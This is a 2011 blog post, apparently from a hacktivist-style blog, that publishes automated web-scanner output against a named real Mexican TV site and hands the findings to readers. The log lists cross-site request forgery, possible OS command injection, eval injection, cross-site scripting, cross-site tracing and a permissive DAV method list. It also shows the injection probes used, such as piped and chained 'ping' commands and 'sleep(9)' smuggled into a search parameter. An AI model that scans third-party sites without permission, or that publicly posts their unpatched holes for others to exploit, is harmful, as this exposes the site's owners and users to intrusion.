Monday, May 30, 2011

Script at http://www.tv3puebla.com/esmas/

Greetings, Mundo Libre.

Here is a vulnerability in http://www.tv3puebla.com/esmas/

http://www.tv3puebla.com/esmas/

[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.error500
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.getMails
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.lang
[Mon 30 May 2011 11:51:02 AM CDT] The page language is: es
[Mon 30 May 2011 11:51:03 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:52:53 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" has the following DAV methods enabled:
[Mon 30 May 2011 11:52:53 AM CDT] - *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL
[Mon 30 May 2011 11:52:53 AM CDT] Starting formAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Found 2 URLs and 2 different points of injection.
[Mon 30 May 2011 11:52:53 AM CDT] The list of URLs is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/
[Mon 30 May 2011 11:52:53 AM CDT] The list of fuzzable requests is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas | Method: GET | Parameters: (s="Buscar...")
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/ | Method: GET
[Mon 30 May 2011 11:52:53 AM CDT] The web application sent a persistent cookie.
[Mon 30 May 2011 11:52:53 AM CDT] The following scripts are vulnerable to a trivial form of XSRF:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:53:15 AM CDT] The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.
[Mon 30 May 2011 11:53:15 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:53:15 AM CDT] The URL "http://www.tv3puebla.com/esmas/" has the following allowed methods, which include DAV methods: *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
[Mon 30 May 2011 11:53:15 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent the cookie: "bb2_screener_=1306774395+189.131.40.162; path=/esmas/". This information was found in the request with id 138.
[Mon 30 May 2011 11:53:33 AM CDT] A possible ReDoS was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21". . Please review manually. This information was found in the request with id 206.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:43 AM CDT] A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.
[Mon 30 May 2011 11:55:18 AM CDT] eval() input injection was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=sleep(9)%3B". . Please review manually. This information was found in the request with id 330.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:54 AM CDT] Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.
[Mon 30 May 2011 11:55:54 AM CDT] The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.
[Mon 30 May 2011 11:57:03 AM CDT] Password profiling TOP 100:
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774453+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774590+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774294+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] Finished scanning process.


xsrf:get_xsrf Cross site request forgery vulnerability

The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.

osCommanding:Possible OS commanding vulnerability

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%26%26/usr/sbin/ping+-s+localhost+1000+10+".Please review manually. This information was found in the request with id 237.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%7Cping+-n+3+localhost".Please review manually. This information was found in the request with id 241.

xss:xss:Cross site scripting vulnerability

Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.

xst:xst:Cross site tracing vulnerability.

The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.



I'll leave it with you there. Greetings, Mundo Libre.
